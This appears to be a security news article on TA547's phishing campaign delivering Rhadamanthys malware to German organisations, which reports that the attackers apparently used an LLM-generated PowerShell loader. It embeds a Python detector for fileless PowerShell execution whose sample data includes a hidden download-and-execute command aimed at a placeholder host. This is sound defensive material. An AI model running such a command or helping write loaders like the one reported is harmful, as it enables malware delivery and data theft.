11 April 2024

TA547 threat actor targets German orgs with Rhadamanthys info-stealer

The financially motivated cybercriminal threat group known as TA547 has launched a new phishing campaign targeting organizations across various industries in Germany, marking a shift from the gang’s previous modus operandi.

TA547 is a financially focused Initial Access Broker (IAB). Previously, the group mainly targeted organizations in Spain, Switzerland, Austria, and the United States.

Notable aspects of the observed campaign include the use of the Rhadamanthys information-stealing malware instead of TA547's usual payload, NetSupport RAT, and a novel element in the delivery chain: a PowerShell script suspected to have been generated by a Large Language Model (LLM) such as ChatGPT, Gemini, or Copilot.

The emails deployed in this campaign contained a password-protected ZIP file holding an LNK file. When executed, the LNK file launched PowerShell to run a remotely hosted script, so the malicious code was never written directly to disk.
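One way a defender can flag the chain described above from process-creation telemetry (a user-launched PowerShell that fetches a remote script and evaluates it in memory) is shown below. This is an added example, not code from the article or from Proofpoint's research; the cmdlet patterns, the explorer.exe parent assumption and the sample events are constructed assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Indicators of PowerShell fetching and running a script in memory. These patterns are
# assumptions of this example; the article names no specific cmdlets or flags.
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|Net\.WebClient", re.I)
EXECUTE = re.compile(r"Invoke-Expression|\biex\b|\[scriptblock\]::Create", re.I)
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-e(xecutionpolicy|p)\s+bypass|-enc", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event resembles the LNK -> PowerShell -> remote script chain."""
    if basename(ev.image) not in POWERSHELL:
        return []
    reasons = []
    if DOWNLOAD.search(ev.command_line):
        reasons.append("downloads remote content")
    if EXECUTE.search(ev.command_line):
        reasons.append("evaluates code in memory")
    if EVASION.search(ev.command_line):
        reasons.append("uses hidden/no-profile/bypass flags")
    # Double-clicking an LNK normally makes explorer.exe the parent process (assumption).
    if basename(ev.parent_image) == "explorer.exe" and reasons:
        reasons.append("launched interactively from explorer.exe")
    # Require both fetch and in-memory execution so ordinary scripted downloads are not flagged.
    fileless = "downloads remote content" in reasons and "evaluates code in memory" in reasons
    return reasons if fileless else []


def detect(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    return [(i, r) for i, ev in enumerate(events) if (r := analyze(ev))]


# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -nop -ep bypass -c "iex (iwr http://placeholder.invalid/s.ps1 -UseBasicParsing)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

Because the script never touches disk, command-line and script-block logging (not file scanning) is where this chain becomes visible.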

The PowerShell script used to load Rhadamanthys showed characteristics not commonly seen in code written by threat actors or legitimate programmers. Specifically, it featured grammatically correct, highly specific comments above each component, a trait indicative of LLM-generated content. This suggests either that TA547 used LLM-enabled tools directly or that it adopted pre-existing scripts generated by such tools.

“It is important to note, however, that while TA547 incorporated suspected LLM-generated content into the overall attack chain, it did not change the functionality or the efficacy of the malware or change the way security tools defended against it,” Proofpoint researchers noted in a blog post. “In this case, the potentially LLM-generated code was a script which assisted in delivering a malware payload but was not observed to alter the payload itself.”
